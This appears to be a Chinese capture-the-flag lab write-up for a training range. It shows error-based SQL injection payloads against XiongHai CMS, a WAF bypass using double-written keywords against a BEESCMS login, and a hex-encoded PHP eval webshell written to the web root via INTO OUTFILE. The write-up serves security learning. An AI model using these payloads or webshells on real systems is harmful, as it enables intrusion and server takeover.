目录:
渗透第一步-信息收集 1
渗透第一步-信息收集 2
基础环境搭建
sqlmap尝鲜题
sql-注入绕过防护getshell
渗透第一步-信息收集 1
扫到目录之后应该进行二次扫描
http://oovw8022.ia.aqlab.cn:8022/caidian/files/
渗透第一步-信息收集 2
tips说用sql注入拿flag
可以明显看到是熊海cms
熊海cms和beescms也经常被拿来当代码审计学习,熟悉的师傅都知道有哪些漏洞
1' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1)#
1' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name="flag" limit 1,1 ),0x7e),1)#
1' or updatexml(1,concat(0x7e,(select flag from flag),0x7e),1)#
sqlmap尝鲜题
利用sqlmap去跑注入
sql-注入绕过防护getshell
beescms
后台登录有个注入,先正常判断
过滤了union select
从下面可以看出是单独过滤union和select
这不就开始了,这才来到题目绕waf的关键
经过尝试后,在union前面加/*或者采用un union ion,select采用双写绕过
user=1%27+/*union+seselectlect+1,2,3,4,5+--+
没有回显,那么我们只能通过盲注或者报错注入来实现读取flag,这里采用报错注入来得快一些
1' /*union selselectect 1,2,3,4,"" /*into ououtfiletfile 'D:/phpStudy/www/qwe.php'#
into outfile也一样采用注释和双写绕过,前面一直写不进去很奇怪,不过用数字又写入正常
后面对一句话采用16进制编码,你肯定也疑惑怎么得到路径的,其实我也没猜到,本来要让web报错显示路径,爆不出来,前面第一关信息收集这里虽然不是同一个站点,但是明显是phpstudy_pro后面跟www,只能去盲猜了,要嘛phpstudy要嘛phpstudy_pro
两种方式都写在下面了
1111111' /*union selselectect 1,2,3,4,0x3c3f70687020406576616c28245f504f53545b315d293b3f3e /*into outoutfilefile 'D:/phpstudy/www/qwe6.php'--1111111' un union ion selselectect 1,2,3,4,0x3c3f70687020406576616c28245f504f53545b315d293b3f3e in into to outoutfilefile 'D:/phpstudy/www/qwe6.php'--拿到flag
原文始发于微信公众号(扫地僧的茶饭日常):尤里的复仇II 回归
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论